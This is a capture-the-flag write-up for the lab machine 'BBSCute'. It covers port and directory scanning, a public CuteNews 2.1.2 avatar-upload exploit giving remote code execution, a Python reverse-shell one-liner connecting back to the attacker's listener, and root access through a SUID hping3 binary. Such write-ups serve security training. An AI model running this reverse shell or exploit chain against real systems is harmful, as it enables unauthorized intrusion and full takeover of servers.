BBSCute - Easy

Enumeration

Nmap

┌─[sheinn101@parrot]─[~/offsec/BBSCute]
└──╼ [??]$ sudo nmap -sC -sV -oN nmap.out 192.168.129.128
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-07 08:56 +0630
Nmap scan report for 192.168.129.128
Host is up (0.29s latency).
Not shown: 995 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
|   256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_  256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp  open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: 404 Not Found
110/tcp open  pop3     Courier pop3d
|_pop3-capabilities: STLS LOGIN-DELAY(10) PIPELINING USER IMPLEMENTATION(Courier Mail Server) UTF8(USER) UIDL TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3 Courier pop3d
|_pop3-capabilities: TOP LOGIN-DELAY(10) PIPELINING USER IMPLEMENTATION(Courier Mail Server) UTF8(USER) UIDL
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.67 seconds
ba

Directory Scanning

┌─[sheinn101@parrot]─[~/offsec/BBSCute]                                                                                                                               
└──╼ [??]$ sudo dirsearch -u http://192.168.129.128 -w /opt/SecLists/Discovery/Web-Content/common.txt -r -t 60 --full-url                                             
                                                                                                                                                                      
  _|. _ _  _  _  _ _|_    v0.4.1                                                                                                                                      
 (_||| _) (/_(_|| (_| )                                                                                                                                               
                                                                                                                                                                      
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 60 | Wordlist size: 4686                                                                           
                                                                                                                                                                      
Output File: /usr/local/lib/python3.9/dist-packages/dirsearch-0.4.1-py3.9.egg/dirsearch/reports/192.168.129.128/_21-11-07_09-27-56.txt                                
                                                                                                                                                                      
Error Log: /usr/local/lib/python3.9/dist-packages/dirsearch-0.4.1-py3.9.egg/dirsearch/logs/errors-21-11-07_09-27-56.log                                                                                                                                                                                            
Target: http://192.168.129.128/          
                                                                                   
[09:27:57] Starting:                     
[09:28:14] 301 -  317B  - http://192.168.129.128/core  ->  http://192.168.129.128/core/     (Added to queue)                                                          
[09:28:16] 301 -  317B  - http://192.168.129.128/docs  ->  http://192.168.129.128/docs/     (Added to queue)                                                          
[09:28:17] 200 -    1KB - http://192.168.129.128/favicon.ico                       
[09:28:20] 200 -   10KB - http://192.168.129.128/index.html                                                                                                           
[09:28:20] 200 -    6KB - http://192.168.129.128/index.php                         
[09:28:21] 301 -  317B  - http://192.168.129.128/libs  ->  http://192.168.129.128/libs/     (Added to queue)                                                          
[09:28:22] 301 -  319B  - http://192.168.129.128/manual  ->  http://192.168.129.128/manual/     (Added to queue)                                                      
[09:28:29] 403 -  280B  - http://192.168.129.128/server-status                                                           
[09:28:31] 301 -  318B  - http://192.168.129.128/skins  ->  http://192.168.129.128/skins/     (Added to queue)                                                        
[09:28:34] 301 -  320B  - http://192.168.129.128/uploads  ->  http://192.168.129.128/uploads/     (Added to queue)                                                    
[09:28:37] Starting: core/                                                         
[09:28:47] 301 -  325B  - http://192.168.129.128/core/captcha  ->  http://192.168.129.128/core/captcha/     (Added to queue)                                          
[09:28:47] 301 -  326B  - http://192.168.129.128/core/ckeditor  ->  http://192.168.129.128/core/ckeditor/     (Added to queue)                                        
[09:28:49] 301 -  320B  - http://192.168.129.128/core/db  ->  http://192.168.129.128/core/db/     (Added to queue)                                                    
[09:28:54] 301 -  326B  - http://192.168.129.128/core/includes  ->  http://192.168.129.128/core/includes/     (Added to queue)        
[09:28:55] 200 -    0B  - http://192.168.129.128/core/index.html                   
[09:28:56] 301 -  322B  - http://192.168.129.128/core/lang  ->  http://192.168.129.128/core/lang/     (Added to queue) 
[09:28:58] 301 -  325B  - http://192.168.129.128/core/modules  ->  http://192.168.129.128/core/modules/     (Added to queue)                                          
[09:29:07] 301 -  323B  - http://192.168.129.128/core/tools  ->  http://192.168.129.128/core/tools/     (Added to queue)

Web

Default install page for Apache on Port 80

In index.php , We got a login page.

I tried default credentials and some sql injection but nothing work. So let's create a new users.

As you see , we need Captcha to register account, but it's not load on the page.

But in the source code, we can see captcha.php

When we click on that, we will get captcha text .

We can use this Captcha to register accounts.

Finding Exploit

In the bottom of page, we can see that is running Cutenews 2.1.2 , When I google about this and I found and exploit for this.

https://github.com/CRFSlick/CVE-2019-11447-POC

Clone this repo and run it.

python3 CVE-2019-11447.py <username> <pass> http://IP/index.php

┌─[sheinn101@parrot]─[~/offsec/BBSCute/CVE-2019-11447-POC]
└──╼ [??]$ python3 CVE-2019-11447.py shein shein http://192.168.129.128/index.php
-.-. --- --- .-..    .... ....- -..- --- .-.    -... .- -. -. . .-.
[*] Detected version 'CuteNews 2.1.2'
[*] Grabbing session cookie
[*] Logging in as shein:shein
[+] Login Success!
[*] Grabbing __signature_key and __signature_dsi needed for pofile update request
[+] __signature_key: eb376c517713a1ebc76154a292a7044f-shein
[+] __signature_dsi: 7a551d498ea9f93dbe638fcfd9e71f34
[*] Uploading evil avatar... Done!
[*] Validating that the file was uploaded... Yup!
[+] http://192.168.129.128/uploads/avatar_shein_31095.php?cmd=<cmd>
[*] Looks like everything went smoothly, lets see if we have RCE!
[*] Keep in mind that this shell is limited, no STDERR

$> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$>

Getting Reverse Shell

Now we get a shell. To get a stable shell , Listen with netcat and run the following command

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.135",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

┌─[sheinn101@parrot]─[~/offsec/BBSCute]
└──╼ [??]$ rlwrap nc -nvlp 9001
listening on [any] 9001 ...
connect to [192.168.49.135] from (UNKNOWN) [192.168.135.128] 35872
which python
which python
/usr/bin/python
python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cute:/var/www/html/uploads$

Now we get a stable shell. As a easy box, let's find what binary has SUID bit is set.

Privilege Escaplation

find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/mount
/usr/sbin/hping3
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
www-data@cute:/home/fox$

We can see hping3 has SUID bit. When we find hping3 in GTFObin and we can see like this,

hping3 has already SUID bit and we don't need to add sudo . Run hping3 and type /bin/bash -p

hping3
/bin/bash -p
/bin/bash -p
id; whoami
id; whoami
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
root
bash-5.0#

Now we pwned it.

PreviousFunboxEasyEnum - Easy NextCapture The Flag (CTF)

Last updated 1 year ago